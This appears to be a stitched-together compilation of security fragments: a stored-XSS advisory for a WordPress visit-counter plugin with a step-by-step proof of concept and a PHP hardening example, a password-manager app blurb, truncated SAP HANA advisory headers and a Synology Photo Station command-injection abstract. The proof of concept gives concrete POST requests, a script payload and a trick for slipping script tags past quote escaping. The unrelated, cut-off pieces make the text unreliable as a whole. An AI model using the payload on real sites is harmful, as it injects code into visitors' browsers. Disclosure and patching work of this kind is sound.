Any authenticated or unauthenticated user can perform a stored XSS attack simply by exploiting the wp_ajax_nopriv_check_stat action. The plugin uses a widget to display the website's visit count, so any page that contains this widget will also load the malicious JS code.
2. Proof of Concept
* Send a POST request to `http://www.free-counter.org/Api.php` in order to reveal the counter id of the vulnerable site. The POST data must contain the following vars: `action=create_new_counter&site_url=http%3A%2f%my.vulnerable.website.com`
* As a response we get a serialized indexed array. The value that we need to know is the 'counter_id'.
* Send a POST request to `http://my.vulnerable.website.com/wp-admin/admin-ajax.php` with data: `action=check_stat&id_counter=<counter_id from step 2>&value_=<script>alert(1)</script>`
* Visit a page of the infected website that displays the plugin's widget.
Note that the plugin uses the update_option function to store the $_POST['value_'] contents in the DB, so any code inserted there will be escaped. However, a malicious user can omit the quotes in the src attribute of the script tag, and most modern browsers will treat the tag as if they were there.
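A hardened handler for the check_stat action, as an added example that is not the plugin's own code: the option key fc_visit_count, the function names and the widget markup are assumptions, and the nopriv registration is kept as the page describes it. The point is that quote escaping on the way to the database is not a defense against a value that should never have been markup in the first place.

```php
<?php
// Added example, not the plugin's code. Assumed (hypothetical) names:
// option key 'fc_visit_count', functions fc_handle_check_stat() and fc_render_widget().

function fc_handle_check_stat() {
    $counter_id = isset( $_POST['id_counter'] ) ? absint( wp_unslash( $_POST['id_counter'] ) ) : 0;
    $value      = isset( $_POST['value_'] ) ? (string) wp_unslash( $_POST['value_'] ) : '';

    // A visit count is a plain non-negative integer, so validate the type at the
    // boundary instead of relying on quote escaping on the way to the DB: a <script>
    // tag written without quotes survives that escaping, but it never matches this pattern.
    if ( 0 === $counter_id || ! preg_match( '/^\d{1,12}$/', $value ) ) {
        wp_send_json_error( array( 'message' => 'invalid counter id or value' ), 400 );
    }

    update_option( 'fc_visit_count', (int) $value );
    wp_send_json_success();
}
// Registered on both hooks, as on the page; the validation above is what closes the stored XSS.
add_action( 'wp_ajax_check_stat', 'fc_handle_check_stat' );
add_action( 'wp_ajax_nopriv_check_stat', 'fc_handle_check_stat' );

// Output side: escape at render time even though only integers should be stored,
// so data stored before the fix cannot reach the page as markup either.
function fc_render_widget() {
    $count = get_option( 'fc_visit_count', 0 );
    echo '<div class="fc-visits">Visits: ' . esc_html( (string) $count ) . '</div>';
}
```

Existing option values written before the fix still need to be reviewed and reset, since the input check only protects new writes.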
Overview

"With the Password Manager Secret Server app, you can access passwords for an EXISTING on-premise Secret Server or Secret Server Online account."
"This password app combines enterprise-level security with home-user simplicity, making it a convenient choice for both IT professionals AND home users."
"Count on Extreme Security: Your passwords are safely stored on a secure server, not on your phone. You get top-level AES 256 bit encryption. You get a personal pin code lock for an additional layer of security. A built-in password generator creates strong, unique passwords. Your data is backed by a leading enterprise password management platform."
"Safe Storage for: Enterprise-level or personal passwords. Bank account and tax numbers. ATM Pins. Social security numbers. Credit card numbers. Combination lock numbers"
Onapsis Security Advisory ONAPSIS-2015-007: SAP HANA Log Injection Vulnerability
1. Impact on Business
=====================
Under certain conditions the SAP HANA XS engine is vulnerable to arbitrary log injection, allowing remote authenticated attackers to write arbitrary information to log files. This could be used to corrupt log files or to add fake content that misleads an administrator.
Risk Level: Medium
2. Advisory Information
=======================
- Public Release Date: 2015-05-27
- Subscriber Notification Date: 2015-05-27
- Last Revised: 2015-05-27
- Security Advisory ID: ONAPSIS-2015-007
- Onapsis SVS ID: ONAPSIS-00140
- CVE: CVE-2015-3994
- Researcher: Fernando Russ, Nahuel D. Sánchez
- Initial Base CVSS v2: 4.0 (AV:N/AC:L/Au:S/C:N/I:P/A:N)
Onapsis Security Advisory ONAPSIS-2015-006: SAP HANA Information Disclosure via SQL IMPORT FROM statement
1. Impact on Business
=====================
Under certain conditions some SAP HANA Database commands could be abused by a remote authenticated attacker to access information which is restricted. This could be used to gain access to confidential information.
------------------------------------------------------------------------
Command injection vulnerability in Synology Photo Station
------------------------------------------------------------------------
Han Sahin, May 2015

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A command injection vulnerability was found in Synology Photo Station, which allows an attacker to execute arbitrary commands with the privileges of the webserver. An attacker can use this vulnerability to compromise a Synology DiskStation NAS, including all data stored on the NAS.

------------------------------------------------------------------------
Tested version
------------------------------------------------------------------------
This issue was tested on Synology Photo Station version 6.2-2858.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
Synology reports that this issue has been resolved in Photo Station version 6.3-2945.
https://www.synology.com/en-us/releaseNote/PhotoStation